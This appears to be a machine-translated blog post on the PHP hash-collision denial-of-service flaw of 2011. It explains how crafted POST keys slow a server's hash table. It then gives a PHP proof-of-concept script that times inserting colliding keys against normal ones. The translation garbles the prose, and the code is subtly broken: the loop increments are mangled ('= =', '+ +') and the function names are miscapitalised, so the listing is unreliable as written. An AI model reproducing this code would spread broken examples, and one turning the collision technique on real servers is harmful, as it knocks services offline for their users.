Recently (looks like number 28th) from abroad (address: http://nikic.github.com/2011/12/28/Supercolliding-a-PHP-array.html) burst a new PHP conflict about array, You can use a conflict that invokes a hash table to make a denial-of-service attack on the server.
Rationale: At present many languages, using hash to store key–value data, including commonly used post data from users, can be constructed with a request header and accompanied by a large number of special "key" values (customized according to the hash algorithm for each language). The hash table that saves post data at the bottom of the language is degraded to a linked list because of "conflict" (collision).
In this way, if the amount of data is large enough, then the language can be computed, found, inserted, causing a large amount of CPU footprint, thereby implementing a denial-of-service attack.
<?php
$size = POW (2, 16);
$startTime = Microtime (true);
$array = Array ();
for ($key = 0, $maxKey = ($size-1) * $size; $key <= $maxKey; $key = = $size) {
$array [$key] = 0;
}
$endTime = Microtime (true);
echo ' Insert '. $size. ' A malicious element is needed '. $endTime-$startTime. ' seconds '. "\ n";
$startTime = Microtime (true);
$array = Array ();
for ($key = 0, $maxKey = $size-1; $key <= $maxKey; + + $key) {
$array [$key] = 0;
}
$endTime = Microtime (true);
echo ' Insert '. $size. ' A common element is needed '. $endTime-$startTime. ' seconds '. "\ n";
/**
* Results
*
* It takes 36.357950925827 seconds to insert 65,536 malicious elements
* 0.029613018035889 seconds to insert 65,536 normal elements
*/